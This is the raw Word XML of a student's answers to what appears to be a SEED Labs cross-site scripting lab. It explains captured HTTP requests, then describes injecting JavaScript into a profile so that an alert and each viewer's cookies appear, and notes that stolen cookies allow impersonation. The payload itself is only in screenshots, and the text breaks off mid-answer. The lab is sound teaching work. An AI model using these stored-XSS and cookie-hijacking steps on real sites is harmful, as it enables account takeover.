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4FC672" w14:textId="324E3A13" w:rsidR="003F138A" w:rsidRDefault="003F138A">
      <w:r>
        <w:t>Q1: None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16C09E" w14:textId="77777777" w:rsidR="003E2539" w:rsidRDefault="003E2539"/>
    <w:p w14:paraId="3CD699A9" w14:textId="1AC7F1BB" w:rsidR="00BC1B46" w:rsidRDefault="00BC1B46">
      <w:r>
        <w:t>Q2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03914434" w14:textId="434DB7FC" w:rsidR="00BC1B46" w:rsidRDefault="00BC1B46">
      <w:r>
        <w:t>One GET request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17981218" w14:textId="6902FA4D" w:rsidR="00BC1B46" w:rsidRDefault="00BC1B46">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7BBDDC83" wp14:editId="623E3073">
            <wp:extent cx="5943600" cy="1272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1272540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="172F830E" w14:textId="20121DF9" w:rsidR="00F4200E" w:rsidRDefault="004A4821">
      <w:r>
        <w:t>Explanation: Retrieve a .jpg image named “SilverShadeHover.jpg”</w:t>
      </w:r>
      <w:r w:rsidR="001670E6">
        <w:t xml:space="preserve"> from the host “seedsecuritylabs.org”</w:t>
      </w:r>
      <w:r w:rsidR="00F85575">
        <w:t xml:space="preserve"> under the path “seedsecuritylabs.org/assets/css/img/SilverShadeHover.jpg” using the https protocol. </w:t>
      </w:r>
      <w:r w:rsidR="008A028B">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00F85575">
        <w:t>his request originated from</w:t>
      </w:r>
      <w:r w:rsidR="008F7409">
        <w:t xml:space="preserve"> the address</w:t>
      </w:r>
      <w:r w:rsidR="00F85575">
        <w:t xml:space="preserve"> “https://seedsecuritylabs.org/assets/css/style_home.css”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B470C58" w14:textId="77777777" w:rsidR="00F4200E" w:rsidRDefault="00F4200E"/>
    <w:p w14:paraId="18030ACB" w14:textId="47B82549" w:rsidR="00BC1B46" w:rsidRDefault="00BC1B46">
      <w:r>
        <w:t>One POST request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7B47F1" w14:textId="22AAFB0C" w:rsidR="00BC1B46" w:rsidRDefault="00F42A42">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5DF89E4D" wp14:editId="464BD587">
            <wp:extent cx="5943600" cy="2405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14:paraId="283C03FF" w14:textId="0EF1F134" w:rsidR="0008419F" w:rsidRDefault="004A2632">
      <w:r>
        <w:t>Explanation: Calls an API</w:t>
      </w:r>
      <w:r w:rsidR="009C7701">
        <w:t xml:space="preserve"> from the host “piazza.com”</w:t>
      </w:r>
      <w:r w:rsidR="0052487C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F2EB9">
        <w:t xml:space="preserve">to get online users </w:t>
      </w:r>
      <w:r w:rsidR="007C3B6D">
        <w:t xml:space="preserve">using the https protocol. </w:t>
      </w:r>
      <w:r w:rsidR="00577591">
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00BB35A2">
        <w:t xml:space="preserve">“method” – “network.get_online_users” and the </w:t>
      </w:r>
      <w:r w:rsidR="00577591">
        <w:t>parameters</w:t>
      </w:r>
      <w:r w:rsidR="00BB35A2">
        <w:t xml:space="preserve"> “params” -</w:t>
      </w:r>
      <w:r w:rsidR="00577591">
        <w:t xml:space="preserve"> “nid” and “uid”</w:t>
      </w:r>
      <w:r w:rsidR="00BB35A2">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00577591">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidR="00B17053">
        <w:t>written</w:t>
      </w:r>
      <w:r w:rsidR="0052487C">
        <w:t xml:space="preserve"> in the body of the POST request.</w:t>
      </w:r>
      <w:r w:rsidR="008B53A5">
        <w:t xml:space="preserve"> This request originated from the address “https://piazza.com/class/k5ycztohj8k71d”,</w:t>
      </w:r>
      <w:r w:rsidR="0068655C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B53A5">
        <w:t xml:space="preserve">the address </w:t>
      </w:r>
      <w:r w:rsidR="0068655C">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="008B53A5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002D2AD5">
        <w:t>our</w:t>
      </w:r>
      <w:r w:rsidR="008B53A5">
        <w:t xml:space="preserve"> PCS class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BF01B3" w14:textId="24B11781" w:rsidR="00EA4BFE" w:rsidRDefault="00EA4BFE"/>
    <w:p w14:paraId="38DF83DC" w14:textId="71D25A26" w:rsidR="00EA4BFE" w:rsidRDefault="00EA4BFE"/>
    <w:p w14:paraId="2DD94BBB" w14:textId="043B1C61" w:rsidR="00EA4BFE" w:rsidRDefault="00EA4BFE"/>
    <w:p w14:paraId="6ABC67BD" w14:textId="58E4A7D5" w:rsidR="00EA4BFE" w:rsidRDefault="00EA4BFE"/>
    <w:p w14:paraId="57077EFA" w14:textId="4BFBC0DA" w:rsidR="00EA4BFE" w:rsidRDefault="00EA4BFE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Q3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14224603" w14:textId="37E8C70E" w:rsidR="00C921F6" w:rsidRDefault="00C921F6">
      <w:r>
        <w:t xml:space="preserve">Step 1: Log in as Samy and embed the JavaScript code into </w:t>
      </w:r>
      <w:r w:rsidR="00773395">
        <w:t xml:space="preserve">Samy’s </w:t>
      </w:r>
      <w:r>
        <w:t>profile.</w:t>
      </w:r>
      <w:r w:rsidR="00773395" w:rsidRPr="00773395">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00773395">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16730A33" wp14:editId="102473D0">
            <wp:extent cx="5943600" cy="4201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5E3140BC" w14:textId="06CF843B" w:rsidR="00C921F6" w:rsidRDefault="00C921F6"/>
    <w:p w14:paraId="6210734B" w14:textId="3AF004CB" w:rsidR="00C936DD" w:rsidRDefault="00C936DD">
      <w:r>
        <w:t>Step 2: Log out. Then log in as Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F4A4C2" w14:textId="5D91A9AF" w:rsidR="00C936DD" w:rsidRDefault="00E73542">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62CE7FF6" wp14:editId="68CEB8BA">
            <wp:extent cx="5943600" cy="2175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175510"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFA770D" w14:textId="77777777" w:rsidR="00E73542" w:rsidRDefault="00E73542"/>
    <w:p w14:paraId="443CEDC4" w14:textId="77777777" w:rsidR="004C6C7B" w:rsidRDefault="004C6C7B"/>
    <w:p w14:paraId="382790EA" w14:textId="71991264" w:rsidR="00E73542" w:rsidRDefault="00E73542">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 3: Search for the user “Samy”</w:t>
      </w:r>
      <w:r w:rsidR="003D7B34">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186374ED" w14:textId="72C5DC2C" w:rsidR="003D7B34" w:rsidRDefault="003D7B34">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="54102804" wp14:editId="76605504">
            <wp:extent cx="5943600" cy="2499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99995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B1F177" w14:textId="25328AE6" w:rsidR="00E73542" w:rsidRDefault="003D7B34">
      <w:r>
        <w:t>Step 4: View Samy’s profile and see the alert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F076E87" w14:textId="5242A397" w:rsidR="003D7B34" w:rsidRDefault="008202AD">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="649E3628" wp14:editId="3E38CE45">
            <wp:extent cx="5943600" cy="3361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p>
    <w:p w14:paraId="618ABCA2" w14:textId="22737875" w:rsidR="009C5E2B" w:rsidRDefault="009C5E2B"/>
    <w:p w14:paraId="6C6ABFF3" w14:textId="77777777" w:rsidR="00410B55" w:rsidRDefault="009C5E2B">
      <w:r>
        <w:t xml:space="preserve">Observations: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E0DFAB" w14:textId="60EFD928" w:rsidR="009C5E2B" w:rsidRDefault="009C5E2B">
      <w:r>
        <w:t xml:space="preserve">After embedding the JavaScript code into Samy’s profile (in the brief description field), </w:t>
      </w:r>
      <w:r w:rsidR="0067364B">
        <w:t>I</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r w:rsidR="0067364B">
        <w:t>ged</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in as Boby to view Samy’s profile</w:t>
      </w:r>
      <w:r w:rsidR="00F448E9">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00CA42AC">
        <w:t>saw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an alert with content “XSS”.</w:t>
      </w:r>
      <w:r w:rsidR="005C168B">
        <w:t xml:space="preserve"> I also observed that as soon as I saved Samy’s profile with the JavaScript embedded, the page (Samy’s profile) </w:t>
      </w:r>
      <w:r w:rsidR="00015148">
        <w:t>was</w:t>
      </w:r>
      <w:r w:rsidR="005C168B">
        <w:t xml:space="preserve"> refreshed and the alert could already be observed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CB848A" w14:textId="37A87C33" w:rsidR="00CE6B96" w:rsidRDefault="00CE6B96"/>
    <w:p w14:paraId="55B170BD" w14:textId="1336B9DD" w:rsidR="00CE6B96" w:rsidRDefault="00CE6B96">
      <w:r>
        <w:t>Q4</w:t>
      </w:r>
      <w:r w:rsidR="00131BBD">
        <w:t>.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E8C57" w14:textId="0D012E61" w:rsidR="00E079D2" w:rsidRDefault="00E079D2">
      <w:r>
        <w:t>Step 1: Add additional</w:t>
      </w:r>
      <w:r w:rsidR="00FF5A55">
        <w:t xml:space="preserve"> JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> code </w:t>
      </w:r>
      <w:r w:rsidR="00FF5A55">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>nto Samy’s profile to display the cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015D0467" w14:textId="06135482" w:rsidR="00A37393" w:rsidRDefault="00A37393">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B3C6E66" wp14:editId="7C45351B">
            <wp:extent cx="5943600"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99255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="50336E37" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="148991F7" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="3EF3392E" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="662CA745" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="3012C28E" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="59FF1D11" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="5EBC6FE6" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="53357CFB" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="52B0AB28" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="2EECF2AF" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="15C9CBBD" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="1EF835AD" w14:textId="77777777" w:rsidR="00A37393" w:rsidRDefault="00A37393"/>
    <w:p w14:paraId="2E9DB0E8" w14:textId="2E86F00D" w:rsidR="00A37393" w:rsidRDefault="00A37393">
      <w:r>
        <w:t xml:space="preserve">Step 2: Save </w:t>
      </w:r>
      <w:r w:rsidR="003712CD">
        <w:t>Samy’s</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> profile</w:t>
      </w:r>
      <w:r w:rsidR="003712CD">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Samy’s cookies </w:t>
      </w:r>
      <w:r w:rsidR="007375B3">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">re displayed </w:t>
      </w:r>
      <w:r w:rsidR="005F47DA">
        <w:t>since</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we logged in as Samy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCD11BA" w14:textId="48173BEA" w:rsidR="00A37393" w:rsidRDefault="005F47DA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57F39B58" wp14:editId="4EDC0899">
            <wp:extent cx="5943600" cy="33089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3E626862" w14:textId="604B526A" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1"/>
    <w:p w14:paraId="44A58C0B" w14:textId="191869DC" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1">
      <w:r>
        <w:t>Step 3: Log out. Then log in as Boby.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1CC33" w14:textId="3220D6CC" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73D95F4E" wp14:editId="6707D26F">
            <wp:extent cx="5943600" cy="2918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30DD2E38" w14:textId="7A74471D" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1"/>
    <w:p w14:paraId="59D924A3" w14:textId="7A5F59DA" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1"/>
    <w:p w14:paraId="3706FBD4" w14:textId="21F7C2C4" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1"/>
    <w:p w14:paraId="38F7AF5F" w14:textId="040EC17C" w:rsidR="009D0BF1" w:rsidRDefault="009D0BF1">
      <w:r>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:t>View Samy’s profile</w:t>
      </w:r>
      <w:r w:rsidR="000F1D12">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Boby’s cookies are displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA46C9" w14:textId="7699137D" w:rsidR="009D0BF1" w:rsidRDefault="00C00509">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A761E3D" wp14:editId="7BCAB6A8">
            <wp:extent cx="5943600" cy="3303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75D882D9" w14:textId="77777777" w:rsidR="00D058AC" w:rsidRDefault="00D058AC" w:rsidP="00D058AC"/>
    <w:p w14:paraId="77626CD9" w14:textId="3604EBD8" w:rsidR="00D058AC" w:rsidRDefault="00D058AC" w:rsidP="00D058AC">
      <w:r>
        <w:t xml:space="preserve">Observations: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A72C0D4" w14:textId="385BEA15" w:rsidR="00D058AC" w:rsidRDefault="00D058AC" w:rsidP="00D058AC">
      <w:r>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r>
        <w:t>addin</w:t>
      </w:r>
      <w:r>
        <w:t>g the JavaScript code into Samy’s profile (in the brief description field)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to display cookies</w:t>
      </w:r>
      <w:r>
        <w:t>, I logged in as Boby to view Samy’s profile</w:t>
      </w:r>
      <w:r>
        <w:t>. Apart from seeing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> an alert with content “XSS”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as in the previous question, Boby’s cookies were also displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F6BEDD" w14:textId="6862C25D" w:rsidR="00D058AC" w:rsidRDefault="00D058AC" w:rsidP="00D058AC">
      <w:r>
        <w:t xml:space="preserve">I also observed that as soon as I saved Samy’s profile with the JavaScript embedded, the page (Samy’s profile) was refreshed and </w:t>
      </w:r>
      <w:r>
        <w:t>Samy’s cookies were displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC758FB" w14:textId="0DAD5DF1" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="4EF9A856" w14:textId="5ABBD783" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="7347A87C" w14:textId="1F178C78" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="65748EF7" w14:textId="439D7C7C" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="0BBD8A53" w14:textId="01704D80" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="4C59D595" w14:textId="2D6383CE" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="5DC4507F" w14:textId="4F511019" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="73E36180" w14:textId="75206435" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="76B13711" w14:textId="079A8416" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC"/>
    <w:p w14:paraId="4DC9EBAD" w14:textId="6276ACA6" w:rsidR="00521B45" w:rsidRDefault="00521B45" w:rsidP="00D058AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q4.2 </w:t>
      </w:r>
      <w:r w:rsidR="004D0A75">
        <w:t>Whoever logged in at that moment of viewing Samy’s profile. For example, after saving Samy’s profile (the user</w:t>
      </w:r>
      <w:r w:rsidR="002A15B6">
        <w:t xml:space="preserve"> being</w:t>
      </w:r>
      <w:r w:rsidR="004D0A75">
        <w:t xml:space="preserve"> Samy), Samy’s cookies were displayed; when logged in as Boby to view Samy’s profile, Boby’s cookies were displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCA3A56" w14:textId="522CF3DF" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="21948AF4" w14:textId="5AA37D6B" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="4D0F5659" w14:textId="6070846C" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="5795193F" w14:textId="0DF662F3" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="403ECEAE" w14:textId="448BD136" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="42E5E2F4" w14:textId="0840786B" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="2C58692E" w14:textId="56C7C80D" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="4952795B" w14:textId="7C0681B4" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="20AADAF1" w14:textId="559E0F77" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="2BC41FC0" w14:textId="1E02C239" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="6AE1C465" w14:textId="72383FAA" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="72EF4907" w14:textId="60D17D83" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="5FC9010D" w14:textId="3D3A303B" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="7C591F79" w14:textId="02194F36" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="20006D9C" w14:textId="4B79CCD8" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="1AB45CC7" w14:textId="1457FDC3" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="0EAECF8D" w14:textId="635D000E" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="01D7FCE5" w14:textId="560D8E91" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="6123456A" w14:textId="212AE434" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="05815990" w14:textId="4E55A568" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="46B7542F" w14:textId="02255AE8" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="6E1D22DC" w14:textId="6ECF550C" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="22FE9955" w14:textId="1C4D21FB" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="561D5454" w14:textId="3E38F28F" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="29BE1BD6" w14:textId="7D3EA9F2" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="680A9482" w14:textId="78F03922" w:rsidR="0014423A" w:rsidRDefault="0014423A" w:rsidP="00D058AC"/>
    <w:p w14:paraId="32CCBB7F" w14:textId="2DE9CAEE" w:rsidR="0014423A" w:rsidRDefault="0083122F" w:rsidP="00D058AC">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q4.3 </w:t>
      </w:r>
      <w:r w:rsidR="00E95A6F">
        <w:t>Yes. The attacker could replace his own cookies with the victim’s cookies. And the server w</w:t>
      </w:r>
      <w:r w:rsidR="000F3CDB">
        <w:t xml:space="preserve">ould validate the cookies and believe the attacker </w:t>
      </w:r>
      <w:r w:rsidR="00B16080">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="000F3CDB">
        <w:t>the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698D938D" w14:textId="35C562CD" w:rsidR="00D058AC" w:rsidRDefault="00D058AC"/>
    <w:p w14:paraId="706C19A7" w14:textId="7E210AEF" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="54AD68FC" w14:textId="1BA1769F" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="1C507AE5" w14:textId="56876175" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="22B29D2C" w14:textId="39446864" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="1065A224" w14:textId="260A0271" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="690C67D7" w14:textId="1BF88530" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="281A535D" w14:textId="14FCD0DC" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="41E532A2" w14:textId="10D438DC" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="389618C1" w14:textId="71406CDE" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="4F9D68CC" w14:textId="64CA4687" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="3F00A2E0" w14:textId="1675528E" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="2DECC9A2" w14:textId="70002098" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="4FEF51C4" w14:textId="2B20B16F" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="2043B203" w14:textId="6010E9E4" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="03E9B0A4" w14:textId="372A2AC4" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="67B77AF7" w14:textId="04F546CD" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="50A9DD9F" w14:textId="1FA7EA9D" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="07E05850" w14:textId="44A8AF48" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="16593C2B" w14:textId="7865FD62" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="7BB6888B" w14:textId="24A124B9" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="550A9A28" w14:textId="12C8DF47" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="3F2A6C1A" w14:textId="5981FBF5" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="6AABD006" w14:textId="5C587734" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="48E1FDDA" w14:textId="20D4669E" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="0F718DBF" w14:textId="1257A3C5" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="473265B4" w14:textId="73747983" w:rsidR="008E481D" w:rsidRDefault="008E481D"/>
    <w:p w14:paraId="1A994BC0" w14:textId="3090C37F" w:rsidR="005477F3" w:rsidRDefault="008E481D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Q4.4 </w:t>
      </w:r>
      <w:r w:rsidR="009633A7">
        <w:t>Yes and No. It depends on whether the attacker could gain more i</w:t>
      </w:r>
      <w:r w:rsidR="006143BE">
        <w:t>nformation/pr</w:t>
      </w:r>
      <w:r w:rsidR="00685656">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="006143BE">
        <w:t>v</w:t>
      </w:r>
      <w:r w:rsidR="00685656">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="006143BE">
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00685656">
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidR="006143BE">
        <w:t>ge</w:t>
      </w:r>
      <w:r w:rsidR="00685656">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009633A7">
